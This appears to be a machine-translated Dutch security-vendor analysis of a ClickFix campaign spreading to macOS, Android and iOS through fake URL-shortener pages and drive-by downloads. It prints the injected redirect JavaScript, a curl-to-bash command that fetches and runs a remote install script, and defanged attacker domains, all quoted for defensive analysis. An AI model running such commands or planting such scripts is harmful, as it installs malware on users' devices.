Wat begon als een op Windows gerichte social engineering-truc is uitgegroeid tot een bedreiging op meerdere platforms aan de clientzijde. In dit artikel bespreken we een recente ClickFix-variant die zich nu richt op macOS, Android en iOS, met behulp van browsergebaseerde omleidingen, valse UI-prompts en zelfs drive-by-downloadtechnieken.
Wat is een ClickFix-aanval?
ClickFix-aanvallen zijn niet nieuw. Mijn eerste ontmoeting met één was binnen September 2024:
Een ClickFix-aanval is een vorm van gerichte social engineering of client-side aanval waarbij gebruik wordt gemaakt van het instinct van een gebruiker om ‘gewoon het probleem op te lossen’. Het begint meestal met een overtuigende boodschap die wijst op een vermeend probleem (zoals een beveiligingsprobleem of een repositoryprobleem). De gebruiker wordt aangespoord om op een link te klikken of een opdracht uit te voeren, in de overtuiging dat hij iets belangrijks oplost.
In dit aanvalsvoorbeeld wordt de gebruiker gevraagd een script in de terminal uit te voeren. Op Windows betekende dat PowerShell. Uiteraard werkt dezelfde techniek ook op macOS en Linux. En net als bij Windows ging ik ervan uit dat gebruikers er niet voor zouden trappen.
Aannames vormen echter een gevaarlijk spel in de cyberveiligheid, wat helaas maar weer eens werd bewezen.
Wij zijn cside en monitoren scriptaanvallen van derden aan de clientzijde en verbeteren de realtime bescherming aan de clientzijde voor websites en hun gebruikers. Alleen al in de afgelopen drie maanden hebben we meer dan waargenomen 300.000 gecompromitteerde websites.
Interessant genoeg is dit de tweede keer dat we het nieuws brengen over aanvallers die hun TTP's (Tactieken, technieken en procedures).
Maar wat ooit een bedreiging voor alleen Windows was, richt zich nu ook op andere besturingssystemen.
De aanval in detail
We hebben een waarschuwing ontvangen voor JavaScript gedownload van:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16Het geleverde script:
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
Dit JavaScript is niet erg onduidelijk, wat ongebruikelijk is bij dit soort aanvallen. Het creëert een klikhandler voor elementen met een specifieke klassenaam die een URL op een nieuw tabblad opent wanneer erop wordt geklikt. Dit is wat het doet:
- Hiervoor is een sjabloon-URL nodig (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Vervangt {KEYWORD} door de verwerkte paginatitel
- Koppelt klikhandlers aan alle elementen met de klasseknopPress-16
- Wanneer erop wordt geklikt, openen deze elementen de samengestelde URL op een nieuw tabblad
Hieronder vindt u de omleidingsketen:
Omleidingsketen op de gebruikersinterface
De pagina ziet eruit als een URL-verkorter en vraagt de gebruiker een link te kopiëren. De aanvallers maken misbruik van cutt[.]ly, een legitieme URL-verkorter.
Wanneer een gebruiker de verkorte URL in de browser plakt, wordt hij of zij doorgestuurd naar:
Deze nagebootste URL-verkorterpagina brengt de volgende pop-up:
“Plak de gekopieerde link in de adresregel van de browser.”
Vervolgens wordt de gebruiker doorverwezen naar een downloadpagina (in dit geval voor macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
De inhoud van dit shellbestand als volgt in deze screenshot:
Dit shellscript downloadt vervolgens een macOS uitvoerbaar (gedetecteerd door 10 antivirus-engines op VirusTotal).
Android- en iOS-gedrag
Toen we dit op Android en iOS testten, verwachtten we een ClickFix-variant. Maar in plaats daarvan kwamen we een tegen drive-by-aanval.
Een drive-by-aanval is een soort cyberaanval waarbij kwaadaardige code wordt uitgevoerd of naar een apparaat wordt gedownload door simpelweg een gecompromitteerde of kwaadaardige webpagina te bezoeken. Geen klikken, installaties of interactie vereist.
De pagina heeft ons nu doorgestuurd naar:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Deze site heeft een .tar-bestand gedownload - 7zip beveiligd met een wachtwoord - die de malware heeft uitgepakt en verwijderd (gedetecteerd door 5 AV-engines). En gedetecteerd door 5 leveranciers op VirusTotal.
Gedetecteerd door 5 leveranciers op VirusTotal.
Zowel op Android als op Windows OS werd deze drive-by-aanvalsstijl gebruikt.
Dit is een fascinerende en evoluerende aanval die laat zien hoe aanvallers hun bereik vergroten. Wat begon als een Windows-specifieke ClickFix-campagne richt zich nu op macOS, Android en iOS. Aanzienlijke uitbreiding van de schaal van de operatie.
Het is opnieuw een herinnering aan de enorme verspreiding van aanvallen aan de clientzijde, en de verschillende vormen die deze kunnen aannemen, allemaal door misbruik te maken van het vertrouwen dat gebruikers stellen in browserinteracties wanneer de beveiliging aan de clientzijde ontbreekt of slecht wordt afgedwongen.
